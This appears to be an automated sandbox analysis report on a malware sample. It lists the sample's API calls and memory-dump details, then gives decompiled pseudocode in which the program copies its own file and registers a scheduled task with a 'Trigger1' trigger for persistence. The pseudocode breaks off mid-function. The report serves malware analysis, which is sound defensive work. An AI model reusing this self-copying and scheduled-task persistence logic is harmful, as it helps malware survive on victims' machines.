0x01303666
0x0130366f
0x0130366f
0x0130352e
0x0130352e
0x01303531
0x01303537
0x01303544
0x0130354f
0x01303551
0x0130355d
0x0130355f
0x01303561
0x01303553
0x01303553
0x01303553
0x01303539
0x01303539
0x01303539
0x01303564
0x01303567
0x0130356b
0x01303576
0x0130357d
0x01303580
0x01303585
0x0130358c
0x0130358f
0x01303590
0x013035cd
0x013035ce
0x013035cf
0x013035d4
0x013035d4
0x013035dc
0x013035e4
0x013035f8
0x01303592
0x01303592
0x01303594
0x01303595
0x01303596
0x0130359e
0x013035a5
0x013035ad
0x013035b4
0x013035b4
0x013035b5
0x013035b7
0x013035bc
0x013035c2
0x013035ca
0x013035ca
0x01303590
0x013034f5
0x013034f8
0x013034fa
0x013034fd
0x013034ff
0x013034ff
0x01303505
0x01303505
0x0130350a
0x01303512
0x0130351c
0x0130351c
0x013034c9
0x013034c9
0x013034cd
0x013034cf
0x013034cf
0x013034d1
0x013034d4
0x013034dc
0x013034dc
0x013033ac
0x013033b5
0x013033ba
0x013033c0
0x013033c7
0x013033d1
0x013033d5
0x013033da
0x013033dd
0x00000000
0x013033dd
0x013033a6
0x01303370
0x01303369
0x0130280f
0x00000000
0x0130280f
0x01302809
0x013027dc
0x013027b2
0x013026d2
0x01302677
0x012faef3

APIs

CoInitializeEx.OLE32(00000000,00000000,39CCA9F6), ref: 01302693
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 013026AB
CoCreateInstance.OLE32(01378F5C,00000000,00000001,01378F4C,?), ref: 013026CA
VariantInit.OLEAUT32(?), ref: 013026ED
VariantInit.OLEAUT32(?), ref: 0130270B
VariantInit.OLEAUT32(?), ref: 01302722
VariantInit.OLEAUT32(?), ref: 01302736
VariantClear.OLEAUT32(?), ref: 01302789
VariantClear.OLEAUT32(?), ref: 01302792
VariantClear.OLEAUT32(?), ref: 0130279B
VariantClear.OLEAUT32(?), ref: 013027AB
SysAllocString.OLEAUT32(013836C4), ref: 013027FF
SysFreeString.OLEAUT32(?), ref: 01302858
SysFreeString.OLEAUT32(?), ref: 013028F0
SysAllocString.OLEAUT32(Trigger1), ref: 01302A52
SysFreeString.OLEAUT32(?), ref: 01302A9F
SysFreeString.OLEAUT32(?), ref: 01302B29
SysFreeString.OLEAUT32(00000000), ref: 01302CA0
SysFreeString.OLEAUT32(00000000), ref: 01302E48
SysAllocString.OLEAUT32(013836C0), ref: 01302EDC
SysStringByteLen.OLEAUT32(00000008), ref: 01302F6E
SysAllocStringByteLen.OLEAUT32(00000008,00000000), ref: 01302F76
SysStringByteLen.OLEAUT32(00000008), ref: 01303048
SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 01303052
SysFreeString.OLEAUT32 ref: 013030C9
VariantClear.OLEAUT32(?), ref: 0130310B
SysFreeString.OLEAUT32(-00000001), ref: 01303123
VariantClear.OLEAUT32(?), ref: 0130315E
SysFreeString.OLEAUT32(-00000001), ref: 01303172
VariantClear.OLEAUT32(?), ref: 013031AE
_com_issue_error.COMSUPP ref: 013031E1
_com_issue_error.COMSUPP ref: 013031EB
_com_issue_error.COMSUPP ref: 013031F5
_com_issue_error.COMSUPP ref: 013031FF
_com_issue_error.COMSUPP ref: 01303209

Strings

Trigger1, xrefs: 01302A3F

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: String$Variant$Free$Clear$Alloc_com_issue_error$ByteInit$Initialize$CreateInstanceSecurity
String ID: Trigger1
API String ID: 1493749209-1869269927
Opcode ID: 7df2d9b9501988a3753791602012e8e78ee2391cbb557f51992dc1bc7c47a2c1
Instruction ID: 97e624fc45c7df7392e416699530eedfcce848b408bcc4b0ec01f803470733b4
Opcode Fuzzy Hash: 7df2d9b9501988a3753791602012e8e78ee2391cbb557f51992dc1bc7c47a2c1
Instruction Fuzzy Hash: D7826370E00219DFEB21DFA8C958B9EBBF4FF04718F148259E909AB291D775AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012FAB30, Relevance: 23.0, APIs: 15, Instructions: 477
fileCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E012FAB30(void* __ebx, void* __edx, void* __edi) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v16;
				long _v24;
				intOrPtr _v28;
				signed int _v32;
				int _v36;
				int _v40;
				unsigned int _v44;
				char _v45;
				signed int _v48;
				int _v52;
				unsigned int _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				void* _v100;
				int _v104;
				int _v108;
				signed int _v112;
				int _v116;
				signed int _v120;
				char _v121;
				char _v124;
				signed int _v128;
				int _v132;
				signed int _v136;
				int _v140;
				int _v144;
				char _v148;
				signed int _v152;
				short _v156;
				char _v160;
				signed int _v164;
				int _v168;
				char _v172;
				signed int _v180;
				short _v184;
				signed int _v188;
				intOrPtr _v192;
				signed int _v196;
				char _v204;
				signed int _v208;
				int _v212;
				char _v220;
				signed int _v228;
				signed int _v232;
				char _v252;
				char _v268;
				char _v276;
				int _v292;
				signed int _v296;
				intOrPtr _v308;
				short* _v624;
				char _v644;
				signed int _v648;
				char _v680;
				intOrPtr _v712;
				char _v716;
				short* _v724;
				short* _v756;
				signed int _v764;
				signed int* _v780;
				char _v796;
				intOrPtr _v800;
				char _v813;
				intOrPtr _v824;
				unsigned int _v828;
				intOrPtr _v836;
				intOrPtr _v848;
				void* __esi;
				void* __ebp;
				signed int _t560;
				signed int _t561;
				int _t563;
				void* _t569;
				signed int _t575;
				signed int _t578;
				void* _t583;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				signed int _t602;
				intOrPtr _t607;
				signed int _t609;
				signed int _t610;
				intOrPtr _t612;
				signed int _t615;
				signed int _t630;
				int _t639;
				signed int _t642;
				signed int _t649;
				signed int _t650;
				intOrPtr _t657;
				signed int _t658;
				signed int _t666;
				signed int _t680;
				int _t683;
				signed int* _t690;
				short* _t701;
				void* _t708;
				int _t710;
				signed int _t720;
				void* _t733;
				signed int _t735;
				signed int _t744;
				signed int _t746;
				void* _t749;
				signed int _t750;
				signed int _t751;
				int _t761;
				signed int _t764;
				intOrPtr* _t769;
				signed int* _t770;
				signed int _t771;
				void* _t772;
				signed int _t775;
				signed int _t778;
				int _t781;
				signed int _t784;
				int _t785;
				int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t795;
				signed int _t800;
				intOrPtr* _t806;
				signed int* _t807;
				signed int _t808;
				void* _t809;
				signed int _t811;
				signed int _t813;
				signed int _t815;
				intOrPtr* _t821;
				signed int* _t822;
				signed int _t823;
				void* _t824;
				int _t825;
				signed int _t826;
				signed int _t828;
				signed int _t830;
				int _t831;
				signed int _t834;
				signed int _t836;
				signed int _t839;
				intOrPtr* _t843;
				signed int* _t844;
				signed int _t845;
				void* _t846;
				signed int _t847;
				signed int _t849;
				signed int _t852;
				signed int _t853;
				signed int _t856;
				intOrPtr* _t858;
				signed int* _t859;
				signed int _t860;
				signed int _t867;
				signed int _t871;
				intOrPtr* _t876;
				intOrPtr* _t878;
				int _t880;
				signed int _t883;
				signed int _t884;
				signed int _t887;
				signed int _t888;
				int _t898;
				signed int _t900;
				signed int _t901;
				signed int _t910;
				signed int _t911;
				intOrPtr* _t914;
				signed int _t920;
				signed int _t921;
				signed int _t924;
				signed int _t925;
				signed int _t930;
				signed int _t931;
				signed int _t934;
				signed int _t935;
				void* _t945;
				void* _t947;
				signed int _t949;
				signed int _t950;
				signed int _t967;
				int _t974;
				int _t982;
				signed int _t987;
				signed int _t988;
				signed int _t990;
				char _t991;
				signed int _t995;
				unsigned int _t996;
				signed int _t1002;
				signed int _t1003;
				int _t1004;
				short* _t1012;
				intOrPtr* _t1013;
				intOrPtr* _t1015;
				intOrPtr* _t1016;
				intOrPtr* _t1017;
				intOrPtr* _t1018;
				intOrPtr* _t1020;
				intOrPtr* _t1023;
				intOrPtr* _t1024;
				int _t1025;
				intOrPtr* _t1026;
				intOrPtr* _t1028;
				intOrPtr* _t1029;
				intOrPtr* _t1030;
				intOrPtr* _t1036;
				intOrPtr* _t1037;
				int _t1038;
				intOrPtr* _t1039;
				int _t1040;
				signed int _t1043;
				signed int _t1049;
				signed int _t1050;
				intOrPtr* _t1051;
				void* _t1066;
				void* _t1068;
				signed int _t1071;
				intOrPtr _t1072;
				unsigned int _t1074;
				unsigned int _t1075;
				void* _t1098;
				void* _t1099;
				short* _t1100;
				intOrPtr* _t1103;
				signed int _t1104;
				short* _t1105;
				signed char* _t1107;
				int _t1109;
				intOrPtr _t1110;
				signed int _t1119;
				intOrPtr* _t1120;
				int _t1122;
				void* _t1123;
				void* _t1124;
				intOrPtr* _t1125;
				signed int _t1127;
				signed int _t1128;
				void* _t1129;
				signed char* _t1131;
				signed int _t1132;
				intOrPtr _t1133;
				intOrPtr _t1134;
				signed int _t1136;
				void* _t1138;
				signed int _t1141;
				void* _t1143;
				signed int _t1145;
				intOrPtr* _t1148;
				signed int _t1149;
				intOrPtr* _t1153;
				signed int _t1154;
				intOrPtr* _t1156;
				signed int _t1157;
				intOrPtr* _t1160;
				signed int _t1161;
				signed int _t1164;
				signed int _t1170;
				signed int _t1172;
				void* _t1174;
				void* _t1175;
				void* _t1185;
				signed int _t1188;
				void* _t1189;
				void* _t1194;
				void* _t1196;
				signed int _t1200;
				void* _t1201;
				void* _t1207;
				signed int _t1208;
				void* _t1210;
				void* _t1211;
				void* _t1214;
				void* _t1234;

				_push(__ebx);
				_t945 = _t1185;
				_t1188 = (_t1185 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t945 + 4));
				_t1164 = _t1188;
				_push(0xffffffff);
				_push(0x1365aeb);
				_push( *[fs:0x0]);
				_push(_t945);
				_t1189 = _t1188 - 0xa0;
				_t560 =  *0x13a4018; // 0x39cca9f6
				_t561 = _t560 ^ _t1164;
				_v32 = _t561;
				_push(__edi);
				_push(_t561);
				 *[fs:0x0] =  &_v24;
				_t1122 =  *((intOrPtr*)(_t945 + 8));
				_t563 =  *((intOrPtr*)(_t945 + 0xc));
				_v132 = _t1122;
				_v132 = _t563;
				_v64 = 0;
				_v60 = 7;
				_v80 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_t563 + 0x10)) == 0) {
					L25:
					asm("movups xmm0, [ebp-0x44]");
					 *(_t1122 + 0x10) = 0;
					 *(_t1122 + 0x14) = 0;
					asm("movups [esi], xmm0");
					asm("movq xmm0, [ebp-0x34]");
					asm("movq [esi+0x10], xmm0");
					 *[fs:0x0] = _v24;
					_pop(_t1123);
					return E0132EA79(_v32 ^ _t1164, _t1123);
				} else {
					_v40 = 0;
					_v36 = 7;
					_v56 = 0;
					_t1066 = E012F57D0(_t945, __edx, __edi, 0x210);
					_v40 = 0x104;
					_v36 = 0x107;
					_t1098 = _t1066;
					_v136 = _t1066;
					_t569 = memset(_t1098, 0, 0x82 << 2);
					_t1099 = _t1098 + 0x82;
					 *(_t1066 + 0x208) = _t569;
					E012F5760( &_v56,  &_v136);
					_t1194 = _t1189 + 0x18;
					_v16 = 1;
					_t574 =  >=  ? _v56 :  &_v56;
					_t575 = GetModuleFileNameW(0,  >=  ? _v56 :  &_v56, _v40);
					if(_t575 == 0) {
						__eflags = _v36 - 8;
						_v40 = 0;
						_t577 =  >=  ? _v56 :  &_v56;
						__eflags = 0;
						 *( >=  ? _v56 :  &_v56) = 0;
					} else {
						_t1061 = _v40;
						if(_t575 > _v40) {
							E012F6190(_t945,  &_v56, _t1099, _t575 - _t1061, 0);
						} else {
							_v40 = _t575;
							_t1064 =  >=  ? _v56 :  &_v56;
							( >=  ? _v56 :  &_v56)[_t575] = 0;
						}
					}
					asm("movups xmm0, [ebp-0x2c]");
					asm("movups [ebp-0x5c], xmm0");
					asm("movq xmm0, [ebp-0x1c]");
					asm("movq [ebp-0x4c], xmm0");
					_v16 = 2;
					_t1100 = _v40;
					if(_t1100 == 0) {
						L23:
						_t578 = _v84;
						if(_t578 >= 8) {
							_push(2 + _t578 * 2);
							E012F56A0(_t945, _t1100, _v104);
						}
						goto L25;
					} else {
						_v112 = 0;
						_v108 = 7;
						_v128 = 0;
						_push(_v132);
						_v16 = 3;
						_t967 =  >=  ? _v56 :  &_v104;
						_t1068 = E012F86C0(_t945, _t967, _t1100, _t1100, _t967, "\\", 1);
						_t1196 = _t1194 + 0x10;
						if(_t1068 == 0xffffffff) {
							asm("movq xmm1, [ebp-0x64]");
							asm("movups xmm0, [ebp-0x74]");
							L11:
							asm("movups [ebp-0x94], xmm0");
							asm("movq [ebp-0x84], xmm1");
							_push("\\");
							_v16 = 4;
							_t583 = E012FC400(_t945,  &_v184, _v132, _t1100);
							_v16 = 5;
							_t1100 = E012FC470( &_v56, _t583,  &_v160);
							_t1194 = _t1196 + 8;
							if( &_v80 != _t1100) {
								_t602 = _v60;
								if(_t602 >= 8) {
									_push(2 + _t602 * 2);
									E012F56A0(_t945, _t1100, _v80);
									_t1194 = _t1194 + 8;
								}
								_v64 = 0;
								_v60 = 7;
								_v80 = 0;
								asm("movups xmm0, [edi]");
								asm("movups [ebp-0x44], xmm0");
								asm("movq xmm0, [edi+0x10]");
								asm("movq [ebp-0x34], xmm0");
								 *((intOrPtr*)(_t1100 + 0x10)) = 0;
								 *(_t1100 + 0x14) = 7;
								 *_t1100 = 0;
							}
							_t586 = _v36;
							if(_t586 >= 8) {
								_push(2 + _t586 * 2);
								E012F56A0(_t945, _t1100, _v56);
								_t1194 = _t1194 + 8;
							}
							_v40 = 0;
							_v56 = 0;
							_t588 = _v164;
							_v36 = 7;
							if(_t588 >= 8) {
								_push(2 + _t588 * 2);
								E012F56A0(_t945, _t1100, _v184);
								_t1194 = _t1194 + 8;
							}
							_v168 = 0;
							_v184 = 0;
							_t590 = _v140;
							_v164 = 7;
							if(_t590 >= 8) {
								_push(2 + _t590 * 2);
								E012F56A0(_t945, _t1100, _v160);
								_t1194 = _t1194 + 8;
							}
							_t972 =  >=  ? _v80 :  &_v80;
							_t592 =  >=  ? _v104 :  &_v104;
							if(CopyFileW( >=  ? _v104 :  &_v104,  >=  ? _v80 :  &_v80, 0) == 0) {
								_v64 = 0;
								_t595 =  >=  ? _v80 :  &_v80;
								 *( >=  ? _v80 :  &_v80) = 0;
							}
							goto L23;
						} else {
							_t1071 = _t1068 + 1;
							_v144 = 0;
							_v140 = 7;
							_v160 = 0;
							if(_t1100 < _t1071) {
								_t607 = E012F8000(_t945, _t967, _t1071, _t1100);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t1164);
								_t1072 = _v192;
								__eflags =  *(_t1072 + 0x10);
								if( *(_t1072 + 0x10) == 0) {
									L30:
									return _t607;
								} else {
									_t607 = _v4;
									__eflags =  *(_t607 + 0x10);
									if( *(_t607 + 0x10) == 0) {
										goto L30;
									} else {
										_v4 = _t607;
										_v8 = _t1072;
										_pop(_t1168);
										_push(_t945);
										_t947 = _t1196;
										_t1200 = (_t1196 - 0x00000008 & 0xfffffff8) + 4;
										_v204 =  *((intOrPtr*)(_t947 + 4));
										_t1170 = _t1200;
										_push(0xffffffff);
										_push(0x13662bc);
										_push( *[fs:0x0]);
										_push(_t947);
										_t1201 = _t1200 - 0xe8;
										_t609 =  *0x13a4018; // 0x39cca9f6
										_t610 = _t609 ^ _t1170;
										_v228 = _t610;
										_push(_t1122);
										_push(_t1100);
										_push(_t610);
										 *[fs:0x0] =  &_v220;
										_t612 =  *((intOrPtr*)(_t947 + 8));
										_t974 =  *(_t947 + 0xc);
										_t1073 =  *(_t947 + 0x10);
										_v308 = _t612;
										__eflags =  *(_t612 + 0x10);
										_v292 = _t974;
										_v296 = _t1073;
										if( *(_t612 + 0x10) == 0) {
											L100:
											__eflags = 0;
											goto L101;
										} else {
											__eflags = _t1073;
											if(_t1073 == 0) {
												goto L100;
											} else {
												__eflags =  *(_t974 + 0x10);
												if( *(_t974 + 0x10) == 0) {
													goto L100;
												} else {
													__imp__CoInitializeEx(0, 0);
													__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
													_t615 =  &_v60;
													_v60 = 0;
													__imp__CoCreateInstance(0x1378f5c, 0, 1, 0x1378f4c, _t615);
													__eflags = _t615;
													if(_t615 < 0) {
														goto L100;
													} else {
														_t1125 = __imp__#8;
														 *_t1125( &_v268);
														_v32 = 0;
														asm("movups xmm0, [ebp-0xf0]");
														asm("movups [ebp-0xd8], xmm0");
														 *_t1125( &_v172);
														asm("movups xmm0, [ebp-0x90]");
														asm("movups [ebp-0xc0], xmm0");
														 *_t1125( &_v188);
														asm("movups xmm0, [ebp-0xa0]");
														asm("movups [ebp-0x78], xmm0");
														 *_t1125( &_v204);
														_v32 = 3;
														asm("movups xmm0, [ebp-0xd8]");
														asm("movups [eax], xmm0");
														asm("movups xmm0, [ebp-0xc0]");
														asm("movups [eax], xmm0");
														_t1207 = _t1201 - 0xffffffffffffffe0;
														asm("movups xmm0, [ebp-0x78]");
														asm("movups [eax], xmm0");
														asm("movups xmm0, [ebp-0xb0]");
														asm("movups [eax], xmm0");
														_t630 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x28))))(_v60);
														_t1103 = __imp__#9;
														_t1126 = _t630;
														 *_t1103( &_v204);
														 *_t1103( &_v188);
														 *_t1103( &_v172);
														_v32 = 0xffffffff;
														 *_t1103( &_v268);
														_t639 = _v60;
														__eflags = _t630;
														if(__eflags < 0) {
															L99:
															 *((intOrPtr*)( *_t639 + 8))(_t639);
															goto L100;
														} else {
															_v56 = 0;
															_t1104 =  *( *_t639 + 0x1c);
															_t642 = E0132EA8A(_t1126, __eflags, 0xc);
															_t1127 = _t642;
															_t1208 = _t1207 + 4;
															_v108 = _t1127;
															_v32 = 4;
															__eflags = _t1127;
															if(_t1127 == 0) {
																_t1127 = 0;
																__eflags = 0;
																goto L40;
															} else {
																asm("xorps xmm0, xmm0");
																asm("movq [esi], xmm0");
																 *(_t1127 + 8) = 0;
																 *(_t1127 + 4) = 0;
																 *(_t1127 + 8) = 1;
																__imp__#2("\\");
																 *_t1127 = _t642;
																__eflags = _t642;
																if(_t642 == 0) {
																	L189:
																	E0132FAD0(0x8007000e);
																	goto L190;
																} else {
																	L40:
																	_v32 = 0xffffffff;
																	_v108 = _t1127;
																	__eflags = _t1127;
																	if(_t1127 == 0) {
																		goto L189;
																	} else {
																		_v32 = 5;
																		_t764 =  *_t1104(_v60,  *_t1127,  &_v56);
																		__eflags = _t764;
																		_v32 = 0xffffffff;
																		_v121 = _t764 < 0;
																		_t1104 = _t1104 | 0xffffffff;
																		asm("lock xadd [esi+0x8], eax");
																		__eflags = _t1104 == 1;
																		if(_t1104 == 1) {
																			_t934 =  *_t1127;
																			__eflags = _t934;
																			if(_t934 != 0) {
																				__imp__#6(_t934);
																				 *_t1127 = 0;
																			}
																			_t935 =  *(_t1127 + 4);
																			__eflags = _t935;
																			if(_t935 != 0) {
																				L0132ECE6(_t935);
																				_t1208 = _t1208 + 4;
																				 *(_t1127 + 4) = 0;
																			}
																			_push(0xc);
																			E0132EABA(_t1127);
																			_t1208 = _t1208 + 8;
																		}
																		__eflags = _v121;
																		if(_v121 == 0) {
																			_t1148 =  *((intOrPtr*)( *_v56 + 0x3c));
																			_t769 = _v128;
																			_t1013 = _t769;
																			__eflags =  *((intOrPtr*)(_t769 + 0x14)) - 8;
																			if(__eflags >= 0) {
																				_t1013 =  *_t769;
																			}
																			_t770 = E012F9580( &_v108, __eflags, _t1013);
																			_v32 = 6;
																			_t771 =  *_t770;
																			__eflags = _t771;
																			if(_t771 == 0) {
																				_t772 = 0;
																				__eflags = 0;
																			} else {
																				_t772 =  *_t771;
																			}
																			 *_t1148(_v56, _t772, 0);
																			_v32 = 0xffffffff;
																			_t1149 = _v108;
																			__eflags = _t1149;
																			if(_t1149 != 0) {
																				asm("lock xadd [esi+0x8], eax");
																				__eflags = _t1104 == 1;
																				if(_t1104 == 1) {
																					__eflags = _t1149;
																					if(_t1149 != 0) {
																						_t930 =  *_t1149;
																						__eflags = _t930;
																						if(_t930 != 0) {
																							__imp__#6(_t930);
																							 *_t1149 = 0;
																						}
																						_t931 =  *(_t1149 + 4);
																						__eflags = _t931;
																						if(_t931 != 0) {
																							L0132ECE6(_t931);
																							_t1208 = _t1208 + 4;
																							 *(_t1149 + 4) = 0;
																						}
																						_push(0xc);
																						E0132EABA(_t1149);
																						_t1208 = _t1208 + 8;
																					}
																				}
																			}
																			_t1015 = _v60;
																			_v52 = 0;
																			_t775 =  *((intOrPtr*)( *_t1015 + 0x24))(_t1015, 0,  &_v52);
																			_t1016 = _v60;
																			 *((intOrPtr*)( *_t1016 + 8))(_t1016);
																			__eflags = _t775;
																			if(_t775 >= 0) {
																				_t1017 = _v52;
																				_v76 = 0;
																				_t778 =  *((intOrPtr*)( *_t1017 + 0x3c))(_t1017,  &_v76);
																				__eflags = _t778;
																				if(_t778 < 0) {
																					goto L63;
																				} else {
																					_t1018 = _v76;
																					 *((intOrPtr*)( *_t1018 + 0x48))(_t1018, 1);
																					_t781 = _v76;
																					 *((intOrPtr*)( *_t781 + 8))(_t781);
																					_t1020 = _v52;
																					_v96 = 0;
																					_t784 =  *((intOrPtr*)( *_t1020 + 0x1c))(_t1020,  &_v96);
																					__eflags = _t784;
																					if(_t784 < 0) {
																						L142:
																						_t785 = _v56;
																						goto L98;
																					} else {
																						_t787 = _v96;
																						 *((intOrPtr*)( *_t787 + 8))(_t787);
																						_t1023 = _v52;
																						_v80 = 0;
																						_t790 =  *((intOrPtr*)( *_t1023 + 0x24))(_t1023,  &_v80);
																						__eflags = _t790;
																						if(_t790 < 0) {
																							goto L142;
																						} else {
																							_t1024 = _v80;
																							_v84 = 0;
																							_t792 =  *((intOrPtr*)( *_t1024 + 0x28))(_t1024, 2,  &_v84);
																							_t1025 = _v80;
																							 *((intOrPtr*)( *_t1025 + 8))(_t1025);
																							__eflags = _t792;
																							if(_t792 < 0) {
																								goto L142;
																							} else {
																								_t1026 = _v84;
																								_v64 = 0;
																								_t795 =  *((intOrPtr*)( *_t1026))(_t1026, 0x1378f3c,  &_v64);
																								_t974 = _v84;
																								_t1152 = _t795;
																								_t1073 =  *_t974;
																								 *((intOrPtr*)( *_t974 + 8))(_t974);
																								__eflags = _t795;
																								if(__eflags < 0) {
																									goto L142;
																								} else {
																									_v108 =  *((intOrPtr*)( *_v64 + 0x24));
																									_t800 = E0132EA8A(_t1152, __eflags, 0xc);
																									_t1127 = _t800;
																									_t1208 = _t1208 + 4;
																									_v120 = _t1127;
																									_v32 = 7;
																									__eflags = _t1127;
																									if(_t1127 == 0) {
																										_t1127 = 0;
																										__eflags = 0;
																										goto L73;
																									} else {
																										asm("xorps xmm0, xmm0");
																										asm("movq [esi], xmm0");
																										 *(_t1127 + 8) = 0;
																										 *(_t1127 + 4) = 0;
																										 *(_t1127 + 8) = 1;
																										__imp__#2(L"Trigger1");
																										 *_t1127 = _t800;
																										__eflags = _t800;
																										if(_t800 == 0) {
																											L190:
																											E0132FAD0(0x8007000e);
																											goto L191;
																										} else {
																											L73:
																											_v32 = 0xffffffff;
																											_v120 = _t1127;
																											__eflags = _t1127;
																											if(_t1127 == 0) {
																												goto L189;
																											} else {
																												_v32 = 8;
																												_v108(_v64,  *_t1127);
																												_v32 = 0xffffffff;
																												asm("lock xadd [esi+0x8], eax");
																												__eflags = _t1104 == 1;
																												if(_t1104 == 1) {
																													_t924 =  *_t1127;
																													__eflags = _t924;
																													if(_t924 != 0) {
																														__imp__#6(_t924);
																														 *_t1127 = 0;
																													}
																													_t925 =  *(_t1127 + 4);
																													__eflags = _t925;
																													if(_t925 != 0) {
																														L0132ECE6(_t925);
																														_t1208 = _t1208 + 4;
																														 *(_t1127 + 4) = 0;
																													}
																													_push(0xc);
																													E0132EABA(_t1127);
																													_t1208 = _t1208 + 8;
																												}
																												_push(_t974);
																												_t1153 =  *((intOrPtr*)( *_v64 + 0x3c));
																												_t806 =  &_v156;
																												_push(_t806);
																												L194();
																												_v32 = 9;
																												__eflags =  *((intOrPtr*)(_t806 + 0x14)) - 8;
																												if(__eflags >= 0) {
																													_t806 =  *_t806;
																												}
																												_t807 = E012F9580( &_v108, __eflags, _t806);
																												_v32 = 0xa;
																												_t808 =  *_t807;
																												__eflags = _t808;
																												if(_t808 == 0) {
																													_t809 = 0;
																													__eflags = 0;
																												} else {
																													_t809 =  *_t808;
																												}
																												 *_t1153(_v64, _t809);
																												_t1154 = _v108;
																												__eflags = _t1154;
																												if(_t1154 != 0) {
																													asm("lock xadd [esi+0x8], eax");
																													__eflags = _t1104 == 1;
																													if(_t1104 == 1) {
																														__eflags = _t1154;
																														if(_t1154 != 0) {
																															_t920 =  *_t1154;
																															__eflags = _t920;
																															if(_t920 != 0) {
																																__imp__#6(_t920);
																																 *_t1154 = 0;
																															}
																															_t921 =  *(_t1154 + 4);
																															__eflags = _t921;
																															if(_t921 != 0) {
																																L0132ECE6(_t921);
																																_t1208 = _t1208 + 4;
																																 *(_t1154 + 4) = 0;
																															}
																															_push(0xc);
																															E0132EABA(_t1154);
																															_t1208 = _t1208 + 8;
																														}
																													}
																													_v108 = 0;
																												}
																												_v32 = 0xffffffff;
																												_t811 = _v136;
																												__eflags = _t811 - 8;
																												if(_t811 >= 8) {
																													_push(2 + _t811 * 2);
																													E012F56A0(_t947, _t1104, _v156);
																													_t1208 = _t1208 + 8;
																												}
																												_t1028 = _v64;
																												_t813 =  *((intOrPtr*)( *_t1028 + 0x54))(_t1028, 1);
																												__eflags = _t813;
																												if(_t813 >= 0) {
																													_t1029 = _v64;
																													_v68 = 0;
																													_t815 =  *((intOrPtr*)( *_t1029 + 0x28))(_t1029,  &_v68);
																													_t1030 = _v64;
																													 *((intOrPtr*)( *_t1030 + 8))(_t1030);
																													__eflags = _t815;
																													if(_t815 < 0) {
																														goto L142;
																													} else {
																														_t1156 =  *((intOrPtr*)( *_v68 + 0x20));
																														E012F8010(_t947,  &_v276, _v116, _t1104);
																														asm("movups xmm0, [ebp-0xf8]");
																														asm("movups [ebp-0xe0], xmm0");
																														asm("movq xmm0, [ebp-0xe8]");
																														asm("movq [ebp-0xd0], xmm0");
																														_v32 = 0xb;
																														_push( &_v252);
																														L249();
																														_v32 = 0xc;
																														_t821 = E012F8470( &_v156,  &_v252, "M");
																														_t1208 = _t1208 + 8;
																														_v32 = 0xd;
																														__eflags =  *((intOrPtr*)(_t821 + 0x14)) - 8;
																														if(__eflags >= 0) {
																															_t821 =  *_t821;
																														}
																														_t822 = E012F9580( &_v108, __eflags, _t821);
																														_v32 = 0xe;
																														_t823 =  *_t822;
																														__eflags = _t823;
																														if(_t823 == 0) {
																															_t824 = 0;
																															__eflags = 0;
																														} else {
																															_t824 =  *_t823;
																														}
																														_t825 =  *_t1156(_v68, _t824);
																														_t1157 = _v108;
																														_v116 = _t825;
																														__eflags = _t1157;
																														if(_t1157 != 0) {
																															asm("lock xadd [esi+0x8], ecx");
																															__eflags = _t1104 == 1;
																															if(_t1104 == 1) {
																																__eflags = _t1157;
																																if(_t1157 != 0) {
																																	_t910 =  *_t1157;
																																	__eflags = _t910;
																																	if(_t910 != 0) {
																																		__imp__#6(_t910);
																																		 *_t1157 = 0;
																																	}
																																	_t911 =  *(_t1157 + 4);
																																	__eflags = _t911;
																																	if(_t911 != 0) {
																																		L0132ECE6(_t911);
																																		_t1208 = _t1208 + 4;
																																		 *(_t1157 + 4) = 0;
																																	}
																																	_push(0xc);
																																	E0132EABA(_t1157);
																																	_t1208 = _t1208 + 8;
																																}
																															}
																															_v108 = 0;
																														}
																														_t826 = _v136;
																														__eflags = _t826 - 8;
																														if(_t826 >= 8) {
																															_push(2 + _t826 * 2);
																															E012F56A0(_t947, _t1104, _v156);
																															_t1208 = _t1208 + 8;
																														}
																														_v140 = 0;
																														_v156 = 0;
																														_t828 = _v208;
																														_v136 = 7;
																														__eflags = _t828 - 8;
																														if(_t828 >= 8) {
																															_push(2 + _t828 * 2);
																															E012F56A0(_t947, _t1104, _v228);
																															_t1208 = _t1208 + 8;
																														}
																														_v32 = 0xffffffff;
																														_v228 = 0;
																														_t830 = _v232;
																														_v212 = 0;
																														_v208 = 7;
																														__eflags = _t830 - 8;
																														if(_t830 >= 8) {
																															_push(2 + _t830 * 2);
																															E012F56A0(_t947, _t1104, _v252);
																															_t1208 = _t1208 + 8;
																														}
																														_t831 = _v68;
																														 *((intOrPtr*)( *_t831 + 8))(_t831);
																														__eflags = _v116;
																														if(_v116 < 0) {
																															goto L142;
																														} else {
																															_t1036 = _v52;
																															_v88 = 0;
																															_t834 =  *((intOrPtr*)( *_t1036 + 0x44))(_t1036,  &_v88);
																															__eflags = _t834;
																															if(_t834 < 0) {
																																goto L142;
																															} else {
